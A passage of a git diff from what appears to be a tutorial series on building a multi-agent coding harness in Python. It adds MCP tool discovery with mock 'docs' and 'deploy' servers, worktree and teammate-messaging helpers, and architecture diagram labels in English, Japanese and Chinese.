bind_task_to_worktree(task_id, name) + log_event("create", name, task_id) + print(f" \033[33m[worktree] created: {name} at {path}\033[0m") + return f"Worktree '{name}' created at {path}" + + +def bind_task_to_worktree(task_id: str, worktree_name: str): + task = load_task(task_id) + task.worktree = worktree_name + if task.status == "pending": + task.status = "in_progress" + save_task(task) + + +def remove_worktree(name: str) -> str: + path = WORKTREES_DIR / name + if not path.exists(): + return f"Worktree '{name}' not found" + run_git(["worktree", "remove", str(path), "--force"]) + run_git(["branch", "-D", f"wt/{name}"]) + log_event("remove", name) + for task in list_tasks(): + if task.worktree == name and task.status == "in_progress": + task.status = "completed" + save_task(task) + print(f" \033[33m[worktree] removed: {name}\033[0m") + return f"Worktree '{name}' removed" + + +def keep_worktree(name: str) -> str: + log_event("keep", name) + print(f" \033[36m[worktree] kept: {name}\033[0m") + return f"Worktree '{name}' kept for review (branch: wt/{name})" + + +# ── Prompt Assembly (from s10) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob, " + "create_task, list_tasks, claim_task, complete_task, " + "spawn_teammate, send_message, check_inbox, " + "request_shutdown, submit_plan, review_plan, " + "create_worktree, remove_worktree, keep_worktree, " + "connect_mcp. MCP tools are prefixed mcp__{server}__{tool}.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "team": "You can spawn autonomous teammates, create worktrees, " + "and connect MCP servers for external tools.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("has_team"): + sections.append(PROMPT_SECTIONS["team"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + mcp_names = list(mcp_clients.keys()) + if mcp_names: + sections.append(f"Connected MCP servers: {', '.join(mcp_names)}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (from s15) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +# ── MessageBus (from s15) ── + +MAILBOX_DIR = WORKDIR / ".mailboxes" +MAILBOX_DIR.mkdir(exist_ok=True) + + +class MessageBus: + def send(self, from_agent: str, to_agent: str, content: str, + msg_type: str = "message", metadata: dict = None): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time(), "metadata": metadata or {}} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + print(f" \033[33m[bus] {from_agent} → {to_agent}: " + f"({msg_type}) {content[:50]}\033[0m") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines() + if line.strip()] + inbox.unlink() + return msgs + + +BUS = MessageBus() +active_teammates: dict[str, bool] = {} + + +# ── Protocol State (from s16) ── + +@dataclass +class ProtocolState: + request_id: str + type: str + sender: str + target: str + status: str + payload: str + created_at: float = field(default_factory=time.time) + + +pending_requests: dict[str, ProtocolState] = {} + + +def new_request_id() -> str: + return f"req_{random.randint(0, 999999):06d}" + + +def match_response(response_type: str, request_id: str, approve: bool): + state = pending_requests.get(request_id) + if not state: + print(f" \033[31m[protocol] unknown request_id: {request_id}\033[0m") + return + state.status = "approved" if approve else "rejected" + icon = "✓" if approve else "✗" + color = "32" if approve else "31" + print(f" \033[{color}m[protocol] {state.type} {icon} " + f"({request_id}: {state.status})\033[0m") + + +# ── Autonomous Agent (from s17) ── + +IDLE_POLL_INTERVAL = 5 +IDLE_TIMEOUT = 60 + + +def scan_unclaimed_tasks() -> list[dict]: + unclaimed = [] + for f in sorted(TASKS_DIR.glob("task_*.json")): + task = json.loads(f.read_text()) + if (task.get("status") == "pending" + and not task.get("owner") + and not task.get("blockedBy")): + unclaimed.append(task) + return unclaimed + + +def idle_poll(agent_name: str, messages: list, + name: str, role: str) -> bool: + for _ in range(IDLE_TIMEOUT // IDLE_POLL_INTERVAL): + time.sleep(IDLE_POLL_INTERVAL) + inbox = BUS.read_inbox(agent_name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + return True + unclaimed = scan_unclaimed_tasks() + if unclaimed: + task_data = unclaimed[0] + claim_task(task_data["id"], agent_name) + wt_info = "" + if task_data.get("worktree"): + wt_info = f"\nWork directory: {WORKTREES_DIR / task_data['worktree']}" + messages.append({"role": "user", + "content": f"Task {task_data['id']}: " + f"{task_data['subject']}{wt_info}"}) + return True + return False + + +# ── Teammate Thread (from s15 + s16 + s17) ── + +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + if name in active_teammates: + return f"Teammate '{name}' already exists" + + system = (f"You are '{name}', a {role}. " + f"Use tools to complete tasks.") + + def handle_inbox_message(name: str, msg: dict, messages: list): + msg_type = msg.get("type", "message") + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + if msg_type == "shutdown_request": + BUS.send(name, "lead", "Shutting down.", + "shutdown_response", + {"request_id": req_id, "approve": True}) + return True + if msg_type == "plan_approval_response": + approve = meta.get("approve", False) + messages.append({"role": "user", + "content": "[Plan approved]" if approve + else f"[Plan rejected] {msg['content']}"}) + return False + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "send_message", + "description": "Send message to another agent.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "list_tasks", + "description": "List all tasks.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + ] + + def _run_list_tasks(): + tasks = list_tasks() + if not tasks: + return "No tasks." + return "\n".join( + f" {t.id}: {t.subject} [{t.status}]" + + (f" (wt:{t.worktree})" if t.worktree else "") + for t in tasks) + + def _run_claim_task(task_id: str): + return claim_task(task_id, owner=name) + + sub_handlers = { + "bash": run_bash, "read_file": run_read, + "write_file": run_write, + "send_message": lambda to, content: (BUS.send(name, to, content), + "Sent")[1], + "list_tasks": _run_list_tasks, + "claim_task": _run_claim_task, + } + + while True: + if len(messages) <= 3: + messages.insert(0, {"role": "user", + "content": f"You are '{name}', role: {role}. " + f"Continue your work."}) + should_shutdown = False + for _ in range(10): + inbox = BUS.read_inbox(name) + for msg in inbox: + stopped = handle_inbox_message(name, msg, messages) + if stopped: + should_shutdown = True + break + if should_shutdown: + break + if inbox and not should_shutdown: + non_protocol = [m for m in inbox + if m.get("type") == "message"] + if non_protocol: + messages.append({"role": "user", + "content": f"{json.dumps(non_protocol)}"}) + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + except Exception: + break + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = sub_handlers.get(block.name) + output = handler(**block.input) if handler else "Unknown" + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": str(output)}) + messages.append({"role": "user", "content": results}) + if should_shutdown: + break + found_work = idle_poll(name, messages, name, role) + if not found_work: + break + + summary = "Done." + for msg in reversed(messages): + if msg["role"] == "assistant" and isinstance(msg["content"], list): + for b in msg["content"]: + if getattr(b, "type", None) == "text": + summary = b.text + break + else: + continue + break + BUS.send(name, "lead", summary, "result") + active_teammates.pop(name, None) + + active_teammates[name] = True + threading.Thread(target=run, daemon=True).start() + return f"Teammate '{name}' spawned as {role}" + + +def _teammate_submit_plan(from_name: str, plan: str) -> str: + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="plan_approval", + sender=from_name, target="lead", + status="pending", payload=plan) + BUS.send(from_name, "lead", plan, + "plan_approval_request", + {"request_id": req_id}) + return f"Plan submitted ({req_id})" + + +# ── Lead Protocol Tools (from s16) ── + +def run_request_shutdown(teammate: str) -> str: + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="shutdown", + sender="lead", target=teammate, + status="pending", payload="") + BUS.send("lead", teammate, "Shut down.", + "shutdown_request", + {"request_id": req_id}) + return f"Shutdown request sent to {teammate}" + + +def run_submit_plan(teammate: str, plan: str) -> str: + BUS.send("lead", teammate, f"Submit plan for: {plan}", "message") + return f"Asked {teammate} to submit a plan" + + +def run_review_plan(request_id: str, approve: bool, + feedback: str = "") -> str: + state = pending_requests.get(request_id) + if not state: + return f"Request {request_id} not found" + state.status = "approved" if approve else "rejected" + BUS.send("lead", state.sender, + feedback or ("Approved" if approve else "Rejected"), + "plan_approval_response", + {"request_id": request_id, "approve": approve}) + return f"Plan {'approved' if approve else 'rejected'}" + + +# ── MCP System (s19 new) ── + +class MCPClient: + """Discovers and calls tools on an MCP server (mock for teaching).""" + + def __init__(self, name: str): + self.name = name + self.tools: list[dict] = [] + self._handlers: dict[str, callable] = {} + + def register(self, tool_defs: list[dict], + handlers: dict[str, callable]): + """Register tools and handlers (simulates tools/list discovery).""" + self.tools = tool_defs + self._handlers = handlers + + def call_tool(self, tool_name: str, args: dict) -> str: + """Call a tool on this server (simulates tools/call).""" + handler = self._handlers.get(tool_name) + if not handler: + return f"MCP error: unknown tool '{tool_name}'" + try: + return handler(**args) + except Exception as e: + return f"MCP error: {e}" + + +mcp_clients: dict[str, MCPClient] = {} + + +def _mock_server_docs(): + """Predefined 'docs' MCP server for demonstration.""" + client = MCPClient("docs") + client.register( + tool_defs=[ + {"name": "search", "description": "Search documentation.", + "inputSchema": {"type": "object", + "properties": {"query": {"type": "string"}}, + "required": ["query"]}}, + {"name": "get_version", "description": "Get API version.", + "inputSchema": {"type": "object", "properties": {}, + "required": []}}, + ], + handlers={ + "search": lambda query: f"[docs] Found 3 results for '{query}'", + "get_version": lambda: "[docs] API v2.1.0", + }) + return client + + +def _mock_server_deploy(): + """Predefined 'deploy' MCP server for demonstration.""" + client = MCPClient("deploy") + client.register( + tool_defs=[ + {"name": "trigger", "description": "Trigger a deployment.", + "inputSchema": {"type": "object", + "properties": {"service": {"type": "string"}}, + "required": ["service"]}}, + {"name": "status", "description": "Check deployment status.", + "inputSchema": {"type": "object", + "properties": {"service": {"type": "string"}}, + "required": ["service"]}}, + ], + handlers={ + "trigger": lambda service: f"[deploy] Triggered: {service}", + "status": lambda service: f"[deploy] {service}: running (v1.4.2)", + }) + return client + + +MOCK_SERVERS = { + "docs": _mock_server_docs, + "deploy": _mock_server_deploy, +} + + +def connect_mcp(name: str) -> str: + """Connect to an MCP server and discover its tools.""" + if name in mcp_clients: + return f"MCP server '{name}' already connected" + factory = MOCK_SERVERS.get(name) + if not factory: + available = ", ".join(MOCK_SERVERS.keys()) + return f"Unknown server '{name}'. Available: {available}" + mcp_client = factory() + mcp_clients[name] = mcp_client + tool_names = [t["name"] for t in mcp_client.tools] + print(f" \033[31m[mcp] connected: {name} → {tool_names}\033[0m") + return (f"Connected to MCP server '{name}'. " + f"Discovered {len(mcp_client.tools)} tools: {', '.join(tool_names)}") + + +def _make_mcp_handler(mcp_client, tool_name): + """Create a handler that routes to the right MCP client/tool pair.""" + def handler(**kwargs): + return mcp_client.call_tool(tool_name, kwargs) + return handler + + +def assemble_tool_pool() -> tuple[list[dict], dict]: + """Merge builtin tools + all MCP tools into one pool.""" + tools = list(BUILTIN_TOOLS) + handlers = dict(BUILTIN_HANDLERS) + for server_name, mcp_client in mcp_clients.items(): + for tool_def in mcp_client.tools: + prefixed = f"mcp__{server_name}__{tool_def['name']}" + tools.append({ + "name": prefixed, + "description": tool_def.get("description", ""), + "input_schema": tool_def.get("inputSchema", {}), + }) + handlers[prefixed] = _make_mcp_handler(mcp_client, tool_def["name"]) + return tools, handlers + + +# ── Lead Worktree Tools (from s18) ── + +def run_create_worktree(name: str, task_id: str = "") -> str: + return create_worktree(name, task_id) + +def run_remove_worktree(name: str) -> str: + return remove_worktree(name) + +def run_keep_worktree(name: str) -> str: + return keep_worktree(name) + + +# ── Basic tool handlers ── + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks." + return "\n".join( + f" {t.id}: {t.subject} [{t.status}]" + + (f" (wt:{t.worktree})" if t.worktree else "") + for t in tasks) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + +def run_spawn_teammate(name: str, role: str, prompt: str) -> str: + return spawn_teammate_thread(name, role, prompt) + +def run_send_message(to: str, content: str) -> str: + BUS.send("lead", to, content) + return f"Sent to {to}" + +def run_check_inbox() -> str: + msgs = BUS.read_inbox("lead") + if not msgs: + return "(inbox empty)" + lines = [] + for m in msgs: + meta = m.get("metadata", {}) + req_id = meta.get("request_id", "") + tag = f" [{m['type']} req:{req_id}]" if req_id else f" [{m['type']}]" + lines.append(f" [{m['from']}]{tag} {m['content'][:200]}") + return "\n".join(lines) + +def run_connect_mcp(name: str) -> str: + return connect_mcp(name) + + +# ── Tool Definitions ── + +BUILTIN_TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", "description": "Create a task.", + "input_schema": {"type": "object", + "properties": {"subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", "description": "List all tasks.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "claim_task", "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "spawn_teammate", "description": "Spawn an autonomous teammate.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}, + "role": {"type": "string"}, + "prompt": {"type": "string"}}, + "required": ["name", "role", "prompt"]}}, + {"name": "send_message", "description": "Send message to a teammate.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "check_inbox", + "description": "Check inbox for messages and protocol responses.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "request_shutdown", + "description": "Request a teammate to shut down.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}}, + "required": ["teammate"]}}, + {"name": "submit_plan", + "description": "Ask a teammate to submit a plan.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}, + "plan": {"type": "string"}}, + "required": ["teammate", "plan"]}}, + {"name": "review_plan", + "description": "Approve or reject a submitted plan.", + "input_schema": {"type": "object", + "properties": {"request_id": {"type": "string"}, + "approve": {"type": "boolean"}, + "feedback": {"type": "string"}}, + "required": ["request_id", "approve"]}}, + {"name": "create_worktree", + "description": "Create an isolated git worktree.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}, + "task_id": {"type": "string"}}, + "required": ["name"]}}, + {"name": "remove_worktree", + "description": "Remove a worktree and auto-complete its task.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}}, + "required": ["name"]}}, + {"name": "keep_worktree", + "description": "Keep a worktree for manual review.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}}, + "required": ["name"]}}, + # s19 new: MCP + {"name": "connect_mcp", + "description": "Connect to an MCP server (docs, deploy) and discover tools.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}}, + "required": ["name"]}}, +] + +BUILTIN_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, + "spawn_teammate": run_spawn_teammate, + "send_message": run_send_message, "check_inbox": run_check_inbox, + "request_shutdown": run_request_shutdown, + "submit_plan": run_submit_plan, "review_plan": run_review_plan, + "create_worktree": run_create_worktree, + "remove_worktree": run_remove_worktree, + "keep_worktree": run_keep_worktree, + "connect_mcp": run_connect_mcp, +} + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "has_team": "teammate" in text or "spawn" in text or + "inbox" in text or "worktree" in text or "mcp" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop (s19: dynamic tool pool) ── + +def agent_loop(messages: list, context: dict): + tools, handlers = assemble_tool_pool() + system = get_system_prompt(context) + while True: + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=tools, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = handlers.get(block.name) + output = handler(**block.input) if handler else "Unknown" + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + + # Re-assemble pool if connect_mcp was called + if any(b.name == "connect_mcp" for b in response.content + if b.type == "tool_use"): + tools, handlers = assemble_tool_pool() + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s19: mcp plugin") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, + "has_team": False, "memories": ""} + while True: + try: + query = input("\033[36ms19 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + + inbox = BUS.read_inbox("lead") + if inbox: + print(f"\n\033[33m[Inbox: {len(inbox)}]\033[0m") + for msg in inbox: + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + msg_type = msg.get("type", "") + if req_id and msg_type.endswith("_response"): + approve = meta.get("approve", False) + match_response(msg_type, req_id, approve) + else: + print(f" [{msg['from']}] {msg['content'][:200]}") + print() diff --git a/s19_mcp_plugin/images/mcp-architecture.en.svg b/s19_mcp_plugin/images/mcp-architecture.en.svg new file mode 100644 index 000000000..478be8f79 --- /dev/null +++ b/s19_mcp_plugin/images/mcp-architecture.en.svg @@ -0,0 +1,110 @@ + + + + + + + + + + + + + + + + + + + + + + MCP Plugin — Standard Protocol + External Tool Integration + Tool Pool Merge + + + + s18 Preserved + + s19 New + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH (s18 + s19) + bash · read · write · task(4) · send · inbox + ★ connect_mcp + dynamic mcp__server__tool tools + + + + + + + MCP Architecture (s19 new: standard protocol + external tools dynamic integration) + + + + Agent Side (MCPClient) + + + connect_mcp → discover → register tools + + + assemble_tool_pool merge builtin + mcp + + + call_tool("mcp__docs__search", ...) + + + + tools/list + + + tools/call + response + + + + MCP Servers (External Services) + + + docs server: search · get_version + + + deploy server: trigger · status + + + Any language, just needs stdio JSON-RPC + + + + Tool naming: mcp__{server}__{tool} → e.g. mcp__docs__search · mcp__deploy__trigger · prevents name collisions across servers + + + + + s18: worktree + events.jsonl + protocols + auto_claim (Lead 16) + + s19: MCPClient + assemble_tool_pool + connect_mcp (Lead 16 + dynamic MCP) + + + + s19 is the final chapter. 19 mechanisms all hook onto the same while True loop — the loop itself, unchanged. + diff --git a/s19_mcp_plugin/images/mcp-architecture.ja.svg b/s19_mcp_plugin/images/mcp-architecture.ja.svg new file mode 100644 index 000000000..6c1c3ec49 --- /dev/null +++ b/s19_mcp_plugin/images/mcp-architecture.ja.svg @@ -0,0 +1,110 @@ + + + + + + + + + + + + + + + + + + + + + + MCP Plugin — 標準プロトコル + 外部ツール統合 + ツールプール統合 + + + + s18 保持 + + s19 新規 + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH(s18 + s19) + bash · read · write · task(4) · send · inbox + ★ connect_mcp + 動的 mcp__server__tool ツール + + + + + + + MCP アーキテクチャ(s19 新規:標準プロトコル + 外部ツール動的統合) + + + + Agent 側(MCPClient) + + + connect_mcp → discover → ツール登録 + + + assemble_tool_pool builtin + mcp 統合 + + + call_tool("mcp__docs__search", ...) + + + + tools/list + + + tools/call + response + + + + MCP Servers(外部サービス) + + + docs server: search · get_version + + + deploy server: trigger · status + + + 任意言語実装、stdio JSON-RPC のみ必要 + + + + ツール命名: mcp__{server}__{tool} → 例: mcp__docs__search · mcp__deploy__trigger · サーバー間の名前衝突を防止 + + + + + s18: worktree + events.jsonl + protocols + auto_claim(Lead 16) + + s19: MCPClient + assemble_tool_pool + connect_mcp(Lead 16 + 動的 MCP) + + + + s19 は最終章。19 の仕組みが全て同じ while True ループに接続 — ループそのものは変わっていない。 + diff --git a/s19_mcp_plugin/images/mcp-architecture.svg b/s19_mcp_plugin/images/mcp-architecture.svg new file mode 100644 index 000000000..843bc05a6 --- /dev/null +++ b/s19_mcp_plugin/images/mcp-architecture.svg @@ -0,0 +1,110 @@ + + + + + + + + + + + + + + + + + + + + + + MCP Plugin — 标准协议 + 外部工具接入 + 工具池合并 + + + + s18 保留 + + s19 新增 + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH (s18 + s19) + bash · read · write · task(4) · send · inbox + ★ connect_mcp + 动态 mcp__server__tool 工具 + + + + + + + MCP 架构(s19 新增:标准协议 + 外部工具动态接入) + + + + Agent Side (MCPClient) + + + connect_mcp → discover → 注册工具 + + + assemble_tool_pool 合并 builtin + mcp + + + call_tool("mcp__docs__search", ...) + + + + tools/list + + + tools/call + response + + + + MCP Servers (外部服务) + + + docs server: search · get_version + + + deploy server: trigger · status + + + 任意语言实现,只需 stdio JSON-RPC + + + + 工具命名: mcp__{server}__{tool} → 例: mcp__docs__search · mcp__deploy__trigger · 避免不同 server 的工具名冲突 + + + + + s18: worktree + events.jsonl + protocols + auto_claim (Lead 16) + + s19: MCPClient + assemble_tool_pool + connect_mcp (Lead 16 + 动态 MCP) + + + + s19 是最终章。19 个机制全部挂在同一个 while True 循环上——循环本身,从未改变。 +